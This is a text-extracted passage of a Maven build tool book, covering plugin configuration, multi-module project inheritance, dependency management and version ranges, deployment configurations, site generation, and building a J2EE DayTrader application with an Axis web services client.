or settings. and in some ways they are. or configure parameters for the plugins already included in the build.. but in most cases these elements are not required. This is often the most convenient way to use a plugin.Getting Started with Maven 2. For example. If it is not present on your local system. you must include additional Maven plugins. plugin developers take care to ensure that new versions of plugins are backward compatible so you are usually OK with the latest release. This is as simple as adding the following to your POM: <project> .apache.. but you may want to specify the version of a plugin to ensure reproducibility.apache. then Maven will default to looking for the plugin with the org. the groupId and version elements have been shown. To illustrate the similarity between plugins and dependencies.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <version>2. If you do not specify a version then Maven will attempt to use the latest released version of the specified plugin. you may want to configure the Java compiler to allow JDK 5. </project> You'll notice that all plugins in Maven 2 look very similar to a dependency.xml.5</source> <target>1.0</version> <configuration> <source>1. For the most part.you can lock down a specific version. The configuration element applies the given parameters to every goal from the compiler plugin. You can specify an additional groupId to search within your POM. If you do not specify a groupId.plugins or the org.maven.7.maven.5</target> </configuration> </plugin> </plugins> </build> .0 sources. <build> <plugins> <plugin> <groupId>org. but if you find something has changed . In the above case.. Using Maven Plugins As noted earlier in the chapter. 53 . this plugin will be downloaded and installed automatically in much the same way that a dependency would be handled. the compiler plugin is already used as part of the build process and this just changes the configuration. to customize the build for a Maven project.mojo groupId label.codehaus..
The next few chapters provide you with the how-to guidelines to customize Maven's behavior and use Maven to manage interdependent software projects. Summary After reading Chapter 2. If you were looking for just a build tool. In eighteen pages. you should be up and running with Maven. read on. testing a project.org/plugins/ and navigating to the plugin and goal you are using. By learning how to build a Maven project. and packaging a project. If someone throws a Maven project at you. 2. 54 .apache.8. You've learned a new language and you've taken Maven for a test drive. you've seen how you can use Maven to build your project. If you want to see the options for the maven-compiler-plugin shown previously. If you are interested in learning how Maven builds upon the concepts described in the Introduction and obtaining a deeper working knowledge of the tools introduced in Chapter 2. you have gained access to every single project using Maven. although you might want to refer to the next chapter for more information about customizing your build to fit your project's unique needs. use the mvn help:describe command. compiling a project.Better Builds with Maven If you want to find out what the plugin's configuration options are. you could stop reading this book now.apache. You should also have some insight into how Maven handles dependencies and provides an avenue for customization using Maven plugins. you'll know how to use the basic features of Maven: creating a project. use the following command: mvn help:describe -DgroupId=org.plugins \ -DartifactId=maven-compiler-plugin -Dfull=true You can also find out what plugin configuration is available by using the Maven Plugin Reference section at.
Berard 55 . ..3.Edward V.
In this chapter. which consists of all the classes that will be used by Proficio as a whole. it is important to keep in mind that Maven emphasizes the practice of standardized and modular builds. • Proficio Model: The data model for the Proficio application. and operate on the pieces of software that are relevant to a particular concept. The guiding principle in determining how best to decompose your application is called the Separation of Concerns (SoC). In doing so. but you are free to name your modules in any fashion your team decides. 56 . Moreover.1. Introduction In the second chapter you stepped though the basics of setting up a simple project. 3. The only real criterion to which to adhere is that your team agrees to and uses a single naming convention. you will see that the Proficio sample application is made up of several Maven modules: • Proficio API: The application programming interface for Proficio. So. Now you will delve in a little deeper. using a real-world example.2. more manageable and comprehensible parts. The natural outcome of this practice is the generation of discrete and coherent components. a key goal for every software development project. encapsulate. lets start by discussing the ideal directory structure for Proficio. houses all the store modules. • Proficio Core: The implementation of the API. • These are default naming conventions that Maven uses. SoC refers to the ability to identify. each of which addresses one or more specific concerns. you will be guided through the specifics of setting up an application and managing that application's Maven structure. The interfaces for the APIs of major components. Proficio has a very simple memory-based store and a simple XStream-based store. which is Latin for “help”. Concerns are the primary motivation for organizing and decomposing software into smaller. like the store.Better Builds with Maven 3. As such. • Proficio Stores: The module which itself. or purpose. and be able to easily identify what a particular module does simply by looking at its name. which enable code reusability. goal. everyone on the team needs to clearly understand the convention. are also kept here. • Proficio CLI: The code which provides a command line interface to Proficio. task. you are going to learn about some of Maven’s best practices and advanced uses by working on a small application to manage frequently asked questions (FAQ). The application that you are going to create is called Proficio. Setting Up an Application Directory Structure In setting up Proficio's directory structure. which consists of a set of interfaces.
0-SNAPSHOT</version> <name>Maven Proficio</name> <url>. A module is a reference to another Maven project. but the Maven team is trying to consistently refer to these setups as multimodule builds now.. <modules> <module>proficio-model</module> <module>proficio-api</module> <module>proficio-core</module> <module>proficio-stores</module> <module>proficio-cli</module> </modules> . This setup is typically referred to as a multi-module build and this is how it looks in the top-level Proficio POM: <project> <modelVersion>4.proficio</groupId> <artifactId>proficio</artifactId> <packaging>pom</packaging> <version>1.apache. which you can see is 1. For an application that has multiple modules.x documentation. It is recommended that you specify the application version in the top-level POM and use that version across all the modules that make up your application. it is very common to release all the sub-modules together.org</url> . You should take note of the packaging element.0</modelVersion> <groupId>org.. For POMs that contain modules. which in this case has a value of pom. you can see in the modules element all the sub-modules that make up the Proficio application.maven. which really means a reference to another POM. the packaging type must be set to value of pom: this tells Maven that you're going to be walking through a set of modules in a structure similar to the example being covered here..Creating Applications with Maven In examining the top-level POM for Proficio.x these were commonly referred to as multi-project builds and some of this vestigial terminology carried over to the Maven 2. so it makes sense that all the modules have a common application version.0.. If you were to look at Proficio's directory structure you would see the following: 57 . </project> An important feature to note in the POM above is the value of the version element. Currently there is some variance on the Maven web site when referring to directory structures that contain more than one Maven project. In Maven 1.0-SNAPSHOT.apache.
0. If you take a look at the POM for the proficio-stores module you will see a set of modules contained therein: <project> <parent> <groupId>org.apache. but the interesting thing here is that we have another project with a packaging type of pom.</modelVersion> <artifactId>proficio-stores</artifactId> <name>Maven Proficio Stores</name> <packaging>pom</packaging> <modules> <module>proficio-store-memory</module> <module>proficio-store-xstream</modul </modules> </project> 58 . which is the proficio-stores module.0-SNAPSHOT</version> </parent> <modelVersion>4.maven.Better Builds with Maven Figure 3-1: Proficio directory structure You may have noticed that the module elements in the POM match the names of the directories in the prior Proficio directory structure.proficio</groupId> <artifactId>proficio</artifactId> <version>1.
enabling you to add resources where it makes sense in the hierarchy of your projects... You can nest sets of projects like this to any level. This is the snippet in each of the POMs that lets you draw on the resources stated in the specified toplevel POM and from which you can inherit down to the level required .proficio</groupId> <artifactId>proficio</artifactId> <version>1. or state your common dependencies ..3. state your deployment information. Let's examine a case where it makes sense to put a resource in the top-level POM. organizing your projects in groups according to concern. just as has been done with Proficio’s multiple storage mechanisms..maven.0-SNAPSHOT</version> <. which are all placed in one directory. Being the observant user. 59 .all in a single place. <parent> <groupId>org. Using project inheritance allows you to do things like state your organizational information.apache. 3. you have probably taken a peek at all the POMs in each of the projects that make up the Proficio project and noticed the following at the top of each of the POMs: . using our top-level POM for the sample Proficio application. Using Project Inheritance One of the most powerful features in Maven is project inheritance.
.codehaus. The dependency is stated as following: <project> .0. you never have to declare this dependency again.1</version> <scope>test</scope> </dependency> </dependencies> .0-SNAPSHOT</version> </parent> <modelVersion>4..apache.apache.. is that each one inherits the dependencies section of the top-level POM. So. by stating the dependency in the top-level POM once.plexus</groupId> <artifactId>plexus-container-default</artifactId> </dependency> </dependencies> </project> 60 .Better Builds with Maven If you look at the top-level POM for Proficio.proficio</groupId> <artifactId>proficio</artifactId> <version>1.maven. </project> What specifically happens for each child POM. In this case the assumption being made is that JUnit will be used for testing in all our child projects.8. in any of your child POMs.proficio</groupId> <artifactId>proficio-api</artifactId> </dependency> <dependency> <groupId>org. So. if you take a look at the POM for the proficio-core module you will see the following (Note: there is no visible dependency declaration for Junit): <project> <parent> <groupId>org.maven. you will see that in the dependencies section there is a declaration for JUnit version 3..8.1. <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.0</modelVersion> <artifactId>proficio-core</artifactId> <packaging>jar</packaging> <name>Maven Proficio Core</name> <dependencies> <dependency> <groupId>org.
take a look at the resulting POM. <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. as the results can be far from desirable. In order to manage. of all your dependencies. for example.Creating Applications with Maven In order for you to see what happens during the inheritance process.. 3. making dependency management difficult to say the least.8. to end up with multiple versions of a dependency on the classpath when your application executes.4. Maven's strategy for dealing with this problem is to combine the power of project inheritance with specific dependency management elements in the POM. Managing Dependencies When you are building applications you typically have a number of dependencies to manage and that number only increases over time. You want to make sure that all the versions. individual projects. After you move into the proficio-core module directory and run the command. 61 . So in this case.. or align. </project> You will have noticed that the POM that you see when using the mvn help:effective-pom is bigger than you expected. <dependencies> . across all of your projects are in alignment so that your testing accurately reflects what you will deploy as your final result.... the proficio-core project inherits from the top-level Proficio project.1</version> <scope>test</scope> </dependency> .. This command will show you the final result for a target POM. You don't want.8.1 dependency: <project> . it is likely that some of those projects will share common dependencies. versions of dependencies across several projects. But remember from Chapter 2 that the Super POM sits at the top of the inheritance hierarchy. you use the dependency management section in the top-level POM of an application. you will see the JUnit version 3. you will need to use the handy mvn help:effective-pom command. which in turn inherits from the Super POM. When you write applications which consist of multiple. so that the final application works correctly.. When this happens it is critical that the same version of a given dependency is used for all your projects. Looking at the effective POM includes everything and is useful to view when trying to figure out what is going on when you are having problems.. </dependencies> .
apache.. As you can see within the dependency management section..maven.version}</version> </dependency> <dependency> <groupId>org. </project> Note that the ${project.apache.apache.proficio</groupId> <artifactId>proficio-model</artifactId> <version>${project.proficio</groupId> <artifactId>proficio-api</artifactId> <version>${project. let's look at the dependency management section of the Proficio top-level POM: <project> . which is the application version. we have several Proficio dependencies and a dependency for the Plexus IoC container..plexus</groupId> <artifactId>plexus-container-default</artifactId> <version>1.maven. 62 .maven.Better Builds with Maven To illustrate how this mechanism works..codehaus.version} specification is the version specified by the top-level POM's version element.proficio</groupId> <artifactId>proficio-core</artifactId> <version>${project.version}</version> </dependency> <dependency> <groupId>org.version}</version> </dependency> <dependency> <groupId>org. There is an important distinction to be made between the dependencies element contained within the dependencyManagment element and the top-level dependencies element in the POM. <dependencyManagement> <dependencies> <dependency> <groupId>org.0-alpha-9</version> </dependency> </dependencies> </dependencyManagement> ... 63 . The dependencies stated in the dependencyManagement only come into play when a dependency is declared without a version. <dependencies> <dependency> <groupId>org. If you take a look at the POM for the proficio-api module.version}) for proficio-model so that version is injected into the dependency above.. to make it complete. whereas the top-level dependencies element does affect the dependency graph.0-SNAPSHOT (stated as ${project. The dependencyManagement declares a stated preference for the 1. you will see a single dependency declaration and that it does not specify a version: <project> .apache.maven.
plexus</groupId> <artifactId>plexus-container-default</artifactId> <version>1. it is usually the case that each of the modules are in flux. Your APIs might be undergoing some change or your implementations are undergoing change and are being fleshed out. but you can use the -U command line option to force the search for updates. 64 . If you look at the top-level POM for Proficio you will see a snapshot version specified: <project> .0-alpha-9</version> </dependency> </dependencies> </dependencyManagement> .apache... Controlling how snapshots work will be explained in detail in Chapter 7. When you specify a non-snapshot version of a dependency Maven will download that dependency once and never attempt to retrieve it again. A snapshot in Maven is an artifact that has been prepared using the most recent sources available.5. By default Maven will look for snapshots on a daily basis.version}</version> </dependency> <dependency> <groupId>org. or you may be doing some refactoring. Snapshot dependencies are assumed to be changing.codehaus.apache.proficio</groupId> <artifactId>proficio-model</artifactId> <version>${project. Using Snapshots While you are developing an application with multiple modules. so Maven will attempt to update them.proficio</groupId> <artifactId>proficio-api</artifactId> <version>${project.0-SNAPSHOT</version> <dependencyManagement> <dependencies> <dependency> <groupId>org. and this is where Maven's concept of a snapshot comes into play. Your build system needs to be able to deal easily with this real-time flux.Better Builds with Maven 3.version}</version> </dependency> <dependency> <groupId>org..maven. <version>1. </project> Specifying a snapshot version for a dependency means that Maven will look for new versions of that dependency without you having to manually specify a new version.maven..
0-alpha-9 (selected for compile) plexus-utils:1. and allowing Maven to calculate the full dependency graph. it is inevitable that two or more artifacts will require different versions of a particular dependency.Creating Applications with Maven 3. this has limitations: • The version chosen may not have all the features required by the other dependencies..0.1-alpha-2 (selected for compile) junit:3. To manually resolve conflicts. Resolving Dependency Conflicts and Using Version Ranges With the introduction of transitive dependencies in Maven 2.0-SNAPSHOT (selected for compile) plexus-utils:1. then the result is undefined. see section 6.4 (selected for compile) classworlds:1. For example.that is. as the graph grows. In Maven.. to compile. there are ways to manually resolve these conflicts as the end user of a dependency. However.1 (not setting.8. if you run mvn -X test on the proficio-core module. In this case. • If multiple versions are selected at the same depth. or you can override both with the correct version.8. Maven must choose which version to provide.9 in Chapter 6). A dependency in the POM being built will be used over anything else. Removing the incorrect version requires identifying the source of the incorrect version by running Maven with the -X flag (for more information on how to do this. and more importantly ways to avoid it as the author of a reusable library. the version selected is the one declared “nearest” to the top of the tree .1 (selected for compile) 65 .0-SNAPSHOT (selected for compile) proficio-model:1.0. it became possible to simplify a POM by including only the dependencies you need directly. While further dependency management features are scheduled for the next release of Maven at the time of writing.1 (selected for test) plexus-container-default:1. the output will contain something similar to: proficio-core:1. local scope test wins) proficio-api:1.6. Maven selects the version that requires the least number of dependencies to be traversed. However.0-SNAPSHOT junit:3. you can remove the incorrect version from the tree.
1 be used.plexus</groupId> <artifactId>plexus-utils</artifactId> </exclusion> </exclusions> </dependency> . In fact.codehaus..0-alpha-9</version> <exclusions> <exclusion> <groupId>org... The reason for this is that it distorts the true dependency graph.1 version is used instead.. You'll notice that the runtime scope is used here. This is because.plexus</groupId> <artifactId>plexus-utils</artifactId> <version>1. if the dependency were required for compilation.codehaus.regardless of whether another dependency introduces it. The alternate way to ensure that a particular version of a dependency is used.1</version> <scope>runtime</scope> </dependency> </dependencies> .codehaus.plexus</groupId> <artifactId>plexus-container-default</artifactId> <version>1.Better Builds with Maven Once the path to the version has been identified. the dependency is used only for packaging. but it is possible to improve the quality of your own dependencies to reduce the risk of these issues occurring with your own build artifacts. use version ranges instead.xml file as follows: . However. To accomplish this. This ensures that Maven ignores the 1.0. <dependencies> <dependency> <groupId>org. Neither of these solutions is ideal. 66 . for stability it would always be declared in the current POM as a dependency . a WAR file).. and Proficio requires version 1. To ensure this. as follows: . for a library or framework. In this example. not for compilation. you can exclude the dependency from the graph by adding an exclusion to the dependency that introduced it. which will accumulate if this project is reused as a dependency itself.4 version of plexus-utils in the dependency graph. is to include it directly in the POM... so that the 1. that will be used widely by others.. in this situation. plexus-utils occurs twice. This is extremely important if you are publishing a build. <dependency> <groupId>org. this approach is not recommended unless you are producing an artifact that is bundling its dependencies and is not used as a dependency itself (for example. modify the plexus-container-default dependency in the proficio-core/pom.
1. then the next nearest will be tested. will be retrieved from the repository. In this case.1.1).1. this indicates that the preferred version of the dependency is 1. as shown above for plexus-utils.1. and so on. but less than 2. you need to avoid being overly specific as well. except 1. To understand how version ranges work. Maven has no knowledge regarding which versions will work.1.) Less than or equal to 1.5 Any version. For instance.) (.codehaus. while the nearest dependency technique will still be used in the case of a conflict. The notation used above is set notation. Figure 3-3: Version parsing 67 . This means that the latest version.0 Between 1.3 (inclusive) Greater than or equal to 1.1.1. the dependency should be specified as follows: <dependency> <groupId>org.5.0. Table 3-2: Examples of Version Ranges Range Meaning (. However. Finally. which is greater than or equal to 1.1. the version that is used must fit the range given. the version you are left with is [1.2. the build will fail.0.0) [1. However. it is necessary to understand how versions are compared. you can see how a version is partitioned by Maven.Creating Applications with Maven When a version is declared as 1. Maven assumes that all versions are valid and uses the “nearest dependency” technique described previously to determine which version to use. you may require a feature that was introduced in plexus-utils version 1.3] [1. it is possible to make the dependency mechanism more reliable for your builds and to reduce the number of exception cases that will be required. if none of them match.1 By being more specific through the use of version ranges.1.2. so in the case of a conflict with another dependency.(1. or there were no conflicts originally.).0 Greater than or equal to 1. If the nearest version does not match.plexus</groupId> <artifactId>plexus-utils</artifactId> <version>[1.1. In figure 3-1. if two version ranges in a dependency graph do not intersect at all.)</version> </dependency> What this means is that.0] [1. but that other versions may be acceptable.2 and 1. and table 3-2 shows some of the values that can be used... <!-.Profiles for the two assemblies to create for deployment --> <profiles> <!-..Creating Applications with Maven If you take a look at the POM for the proficio-cli module you will see the following profile definitions: <project> .xml</descriptor> </descriptors> </configuration> </plugin> </plugins> </build> <activation> <property> <name>memory</name> </property> </activation> </profile> <!-.
SFTP deployment. FTP deployment. It should be noted that the examples below depend on other parts of the build having been executed beforehand. In order to deploy.9.jar file only. <distributionManagement> <repository> <id>proficio-repository</id> <name>Proficio Repository</name> <url>{basedir}/target/deploy</url> </repository> </distributionManagement> . you need to correctly configure your distributionManagement element in your POM. and external SSH deployment. You will also notice that the profiles are activated using a system property. Here are some examples of how to configure your POM via the various deployment mechanisms. SSH2 deployment. so that all child POMs can inherit this information.Better Builds with Maven You can see there are two profiles: one with an id of memory and another with an id of xstream. This is a very simple example. Deploying to the File System To deploy to the file system you would use something like the following: <project> . Deploying your Application Now that you have an application assembly.jar file only. Currently Maven supports several methods of deployment.9. </project> 74 ... you will see that the memory-based assembly contains the proficiostore-memory-1. 3.0-SNAPSHOT. which would typically be your top-level POM. In each of these profiles you are configuring the assembly plugin to point at the assembly descriptor that will create a tailored assembly. If you wanted to create the assembly using the memory-based store. so it might be useful to run mvn install at the top level of the project to ensure that needed components are installed into the local repository.. while the XStream-based store contains the proficio-store-xstream-1.1. including simple file-based deployment. you would execute the following: mvn -Dxstream clean assembly:assembly Both of the assemblies are created in the target directory and if you use the jar tvf command on the resulting assemblies.0-SNAPSHOT.. 3. it is now time to deploy your application assembly. but it illustrates how you can customize the execution of the life cycle using profiles to suit any requirement you might have. you would execute the following: mvn -Dmemory clean assembly:assembly If you wanted to create the assembly using the XStream-based store. you’ll want to share it with as many people as possible! So.
<distributionManagement> <repository> <id>proficio-repository</id> <name>Proficio Repository</name> <url>s Applications with Maven 3...yourcompany.com/deploy</url> </repository> </distributionManagement> .. Deploying with SSH2 To deploy to an SSH2 server you would use something like the following: <project> . <distributionManagement> <repository> <id>proficio-repository</id> <name>Proficio Repository</name> <url>scp://sshserver.. </project> 75 ..com/deploy</url> </repository> </distributionManagement> .3.9. Deploying with SFTP To deploy to an SFTP server you would use something like the following: <project> .9. </project> 3....2.yourcompany.
Deploying with an External SSH Now.4...9. the first three methods illustrated are included with Maven. <project> . 76 . </project> The build extension specifies the use of the Wagon external SSH provider.0-alpha-6</version> </extension> </extensions> </build> .wagon</groupId> <artifactId>wagon-ssh-external</artifactId> <version>1.apache.yourcompany. but to use an external SSH command to deploy you must configure not only the distributionManagement element.Better Builds with Maven 3.maven.com/deploy</url> </repository> </distributionManagement> <build> <extensions> <extension> <groupId>org.. but also a build extension.. <distributionManagement> <repository> <id>proficio-repository</id> <name>Proficio Repository</name> <url>scpexe://sshserver. Wagon is the general purpose transport mechanism used throughout Maven. which does the work of moving your files to the remote server. so only the distributionManagement element is required.
0-alpha-6</version> </extension> </extensions> </build> .yourcompany.Creating Applications with Maven 3. and you are ready to initiate deployment. <distributionManagement> <repository> <id>proficio-repository</id> <name>Proficio Repository</name> <url></url> </repository> </distributionManagement> <build> <extensions> <extension> <groupId>org... simply execute the following command: mvn deploy 77 .apache.9.5..maven. Deploying with FTP To deploy with FTP you must also specify a build extension. </project> Once you have configured your POM accordingly.wagon</groupId> <artifactId>wagon-ftp</artifactId> <version>1.. To deploy to an FTP server you would use something like the following: <project> .
you will see that we have something similarly the following: Figure 3-4: The site directory structure Everything that you need to generate the Web site resides within the src/site directory. For applications like Proficio.10. Maven supports a number of different documentation formats to accommodate various needs and preferences. testing and deploying Proficio. it is recommended that you create a source directory at the top-level of the directory structure to store the resources that are used to generate the web site. If you take a look. 78 . there is a subdirectory for each of the supported documentation formats that you are using for your site and the very important site descriptor. Creating a Web Site for your Application Now that you have walked though the process of building.Better Builds with Maven 3. it is time for you to see how to create a standard web site for an application. Within the src/site directory.
A simple XML format for managing FAQs. • The APT format (Almost Plain Text). Maven also has limited support for: • The Twiki format. • The DocBook Simple format. the most well supported formats available are: • The XDOC format. . which is the FAQ format. • The Confluence format. which is a wiki-like format that allows you to write simple. We will look at a few of the more well-supported formats later in the chapter. which is a simple XML format used widely at Apache. • The FML format. structured documents (like this) very quickly. which is a less complex version of the full DocBook format. • The DocBook format. which is a popular Wiki markup format.Creating Applications with Maven Currently. A full reference of the APT Format is available. which is another popular Wiki markup format.
4.Helen Keller 85 . . Building J2EE Applications Building J2EE Applications This chapter covers: • • • • • Organizing the directory structure Building J2EE archives (EJB. EAR. Web Services) Setting up in-place Web development Deploying J2EE archives to a container Automating container start/stop Keep your face to the sun and you will never see the shadows. WAR.
As importantly. Figure 4-1: Architecture of the DayTrader application 86 . You'll learn not only how to create a J2EE build but also how to create a productive development environment (especially for Web application development) and how to deploy J2EE modules into your container. you’ll learn how to build EARs. EJBs. This chapter will take you through the journey of creating the build for a full-fledged J2EE application called DayTrader.4 application and as a test bed for running performance tests. Web services. This chapter demonstrates how to use Maven on a real application to show how to address the complex issues related to automated builds.2. you’ll learn how to automate configuration and deployment of J2EE application servers. The functional goal of the DayTrader application is to buy and sell stock. Whether you are using the full J2EE stack with EJBs or only using Web applications with frameworks such as Spring or Hibernate. and Web applications.1.Better Builds with Maven 4. and its architecture is shown in Figure 4-1. 4. Introducing the DayTrader Application DayTrader is a real world application developed by IBM and then donated to the Apache Geronimo project. Its goal is to serve as both a functional example of a full-stack J2EE 1. Through this example. Introduction J2EE (or Java EE as it is now called) applications are everywhere. it's likely that you are using J2EE in some of your projects. As a consequence the Maven community has developed plugins to cover every aspect of building J2EE applications.
• • • A typical “buy stock” use case consists of the following steps that were shown in Figure 4-1: 1. and a JMS Server for interacting with the outside world. This request is handled by the Trade Session bean. Once this happens the Trade Broker MDB is notified 6.3. The easy answer is to follow Maven’s artifact guideline: one module = one main artifact. In addition you may need another module producing an EAR which will contain the EJB and WAR produced from the other modules. The Data layer consists of a database used for storing the business objects and the status of each purchase. A new “open” order is saved in the database using the CMP Entity Beans. The Web layer offers a view of the application for both the Web client and the Web services client. • A module producing a WAR which will contain the Web application. • A module producing a JAR that will contain the Quote Streamer client application. Asynchronously the order that was placed on the queue is processed and the purchase completed. • A module producing another JAR that will contain the Web services client application. Organizing the DayTrader Directory Structure The first step to organizing the directory structure is deciding what build modules are required. using Web services. and using the Quote Streamer. The Trade Broker calls the Trade Session bean which in turn calls the CMP entity beans to mark the order as “completed". The order is then queued for processing in the JMS Message Server. This EAR will be used to easily deploy the server code into a J2EE container. The user gives a buy order (by using the Web client or the Web services client). cancel an order. It uses container-managed persistence (CMP) entity beans for storing the business objects (Order. Account. 3. and Message-Driven Beans (MDB) to send purchase orders and get quote changes. The EJB layer is where the business logic is. Holding. 2. buy or sell a stock. and so on. Thus you simply need to figure out what artifacts you need.Building J2EE Applications There are 4 layers in the architecture: • The Client layer offers 3 ways to access the application: using a browser. It uses servlets and JSPs. 87 . 4. The Quote Streamer is a Swing GUI application that monitors quote information about stocks in real-time as the price changes. The creation of the “open” order is confirmed for the user. The user is notified of the completed order on a subsequent request. get a stock quote. logout. you can see that the following modules will be needed: • A module producing an EJB which will contain all of the server-side EJBs. 5. 4.Quote and AccountProfile). The Trade Session is a stateless session bean that offers the business services such as login. Looking again at Figure 4-1.
it is usually easier to choose names that represent a technology instead.the module containing the client side streamer application wsappclient .the module containing the EJBs web .. Best practices suggest to do this only when the need arises. As a general rule. However. For example.. The next step is to give these modules names and map them to a directory structure. it is better to find functional names for modules.the module producing the EAR which packages the EJBs and the Web application There are two possible layouts that you can use to organize these modules: a flat directory structure and a nested one. if you needed to physically locate the WARs in separate servlet containers to distribute the load. This file also contains the list of modules that Maven will build when executed from this directory (see the Chapter 3.] 88 .. for more details): [.the module containing the Web application streamer .the module containing the Web services client application ear .Better Builds with Maven Note that this is the minimal number of modules required. It is possible to come up with more.. Figure 4-2: Module names and a simple flat directory structure The top-level daytrader/pom. For the DayTrader application the following names were chosen: • • • • • ejb . On the other hand.] <modules> <module>ejb</module> <module>web</module> <module>streamer</module> <module>wsappclient</module> <module>ear</module> </modules> [. It is flat because you're locating all the modules in the same directory. you may want to split the WAR module into 2 WAR modules: one for the browser client and one for the Web services client. For example.xml file contains the POM elements that are shared between all of the modules. it is important to split the modules when it is appropriate for flexibility. If there isn't a strong need you may find that managing several modules can be more cumbersome than useful. Figure 4-2 shows these modules in a flat directory structure. Creating Applications with Maven. Let's discuss the pros and cons of each layout.
as shown in Figure 4-4. In this case. not nested within each other. Figure 4-4: Nested directory structure for the EAR. The other alternative is to use a nested directory structure. Having this nested structure clearly shows how nested modules are linked to their parent. if you have many modules in the same directory you may consider finding commonalities between them and create subdirectories to partition them. and is the structure used in this chapter. the ejb and web modules are nested in the ear module. Note that in this case the modules are still separate. EJB and Web modules 89 . you might separate the client side modules from the server side modules in the way shown in Figure 4-3. However.Building J2EE Applications This is the easiest and most flexible structure to use. For example. each directory level containing several modules contains a pom.xml file containing the shared POM elements and the list of modules underneath. Figure 4-3: Modules split according to a server-side vs client-side directory organization As before. This makes sense as the EAR artifact is composed of the EJB and WAR artifacts produced by the ejb and web modules.
Now that you have decided on the directory structure for the DayTrader application. you're going to create the Maven build for each module.0. EJB project. but then you’ll be restricted in several ways.m2\repository\org\apache\geronimo\samples\daytrader\daytrader\1.xml to C:\[. For example. These examples show that there are times when there is not a clear parent for a module. [INFO] --------------------------------------------------------------------[INFO] Building DayTrader :: Performance Benchmark Sample [INFO] task-segment: [install] [INFO] --------------------------------------------------------------------[INFO] [site:attach-descriptor] [INFO] [install:install] [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\pom. In addition. but by some client-side application.. Or the ejb module might be producing a client EJB JAR which is not used by the EAR.]\.xml of the project. the nested strategy doesn’t fit very well with the Assembler role as described in the J2EE specification. For example. the three modules wouldn’t be able to have different natures (Web application project.pom. Depending on the target deployment environment the Assembler may package things differently: one EAR for one environment or two EARs for another environment where a different set of machines are used.. A flat layout is more neutral with regard to assembly and should thus be preferred. starting with the wsappclient module after we take care of one more matter of business.. so before we move on to developing these sub-projects we need to install the parent POM into our local repository so it can be further built on. etc. the ejb or web modules might depend on a utility JAR and this JAR may be also required for some other EAR. EAR project). In those cases using a nested directory structure should be avoided. even though the nested directory structure seems to work quite well here. • It doesn’t allow flexible packaging. We are now ready to continue on with developing the sub-projects! 90 .. it has several drawbacks: • Eclipse users will have issues with this structure as Eclipse doesn’t yet support nested projects. The Assembler has a pool of modules and its role is to package those modules for deployment.. You’d need to consider the three modules as one project.0\daytrad er-1.Better Builds with Maven However. The modules we will work with from here on will each be referring to the parent pom.
and this will be used from DayTrader’s wsappclient module.org/axis/java/userguide. the WSDL files are in src/main/wsdl. Building a Web Services Client Project Web Services are a part of many J2EE applications. For example. which is the default used by the Axis Tools plugin: Figure 4-5: Directory structure of the wsappclient module 91 ..Building J2EE Applications 4. the Maven plugin called Axis Tools plugin takes WSDL files and generates the Java files needed to interact with the Web services it defines. and Maven's ability to integrate toolkits can make them easier to add to the build process. the plugin uses the Axis framework (. Figure 4-5 shows the directory structure of the wsappclient module.apache. As you may notice. As the name suggests. see). We start our building process off by visiting the Web services portion of the build since it is a dependency of later build stages.4.html#WSDL2JavaBuildingStubsSkeletonsAndDataTypesFromWSDL.apache.
Similarly. For example: [.wsdl file.] <plugin> <groupId>org. it would fail.xml.] In order to generate the Java source files from the TradeServices.xml file must declare and configure the Axis Tools plugin: <project> [....Better Builds with Maven The location of WSDL source can be customized using the sourceDirectory property.] <build> <plugins> [. it is required for two reasons: it allows you to control what version of the dependency to use regardless of what the Axis Tools plugin was built against. and more importantly.mojo</groupId> <artifactId>axistools-maven-plugin</artifactId> <configuration> <sourceDirectory> src/main/resources/META-INF/wsdl </sourceDirectory> </configuration> [.codehaus. This is because after the sources are generated. you will require a dependency on Axis and Axis JAXRPC in your pom. any tools that report on the POM will be able to recognize the dependency. it allows users of your project to automatically get the dependency transitively...] <plugin> <groupId>org. the wsappclient/pom..codehaus. At this point if you were to execute the build.. While you might expect the Axis Tools plugin to define this for you...
apache.Building J2EE Applications As before. Thus. 93 .2</version> <scope>provided</scope> </dependency> <dependency> <groupId>org. they are not present on ibiblio and you'll need to install them manually.specs</groupId> <artifactId>geronimo-j2ee_1.geronimo.2</version> <scope>provided</scope> </dependency> <dependency> <groupId>axis</groupId> <artifactId>axis-jaxrpc</artifactId> <version>1.0</version> <scope>provided</scope> </dependency> </dependencies> The Axis JAR depends on the Mail and Activation Sun JARs which cannot be redistributed by Maven. Thus add the following three dependencies to your POM: <dependencies> <dependency> <groupId>axis</groupId> <artifactId>axis</artifactId> <version>1.4_spec</artifactId> <version>1. you need to add the J2EE specifications JAR to compile the project's Java sources. Run mvn install and Maven will fail and print the installation instructions.
0.org/axistoolsmaven-plugin/. running the build with mvn install leads to: C:\dev\m2book\code\j2ee\daytrader\wsappclient>mvn install [.jar [.] [INFO] [axistools:wsdl2java {execution: default}] [INFO] about to add compile source root [INFO] processing wsdl: C:\dev\m2book\code\j2ee\daytrader\wsappclient\ src\main\wsdl\TradeServices.Better Builds with Maven After manually installing Mail and Activation... Now that we have discussed and built the Web services portion...] Note that the daytrader-wsappclient JAR now includes the class files compiled from the generated source files. [INFO] [jar:jar] [INFO] Building jar: C:\dev\m2book\code\j2ee\daytrader\wsappclient\ target\daytrader-wsappclient-1.. The Axis Tools plugin boasts several other goals including java2wsdl that is useful for generating the server-side WSDL file from handcrafted Java classes..]\.0\daytrader-wsappclient-1.m2\repository\org\apache\geronimo\samples\daytrader\ daytrader-wsappclient\1.0. 94 .0. But that's another story. [INFO] [compiler:compile] Compiling 13 source files to C:\dev\m2book\code\j2ee\daytrader\wsappclient\target\classes [INFO] [resources:testResources] [INFO] Using default encoding to copy filtered resources..jar to C:\[. in addition to the sources from the standard source directory. The Axis Tools reference documentation can be found at. [INFO] [compiler:testCompile] [INFO] No sources to compile [INFO] [surefire:test] [INFO] No tests to run.codehaus.wsdl [INFO] [resources:resources] [INFO] Using default encoding to copy filtered resources. lets visit EJBs next.. The generated WSDL file could then be injected into the Web Services client module to generate client-side Java files.jar [INFO] [install:install] [INFO] Installing C:\dev\m2book\code\j2ee\daytrader\wsappclient\ target\daytrader-wsappclient-1.
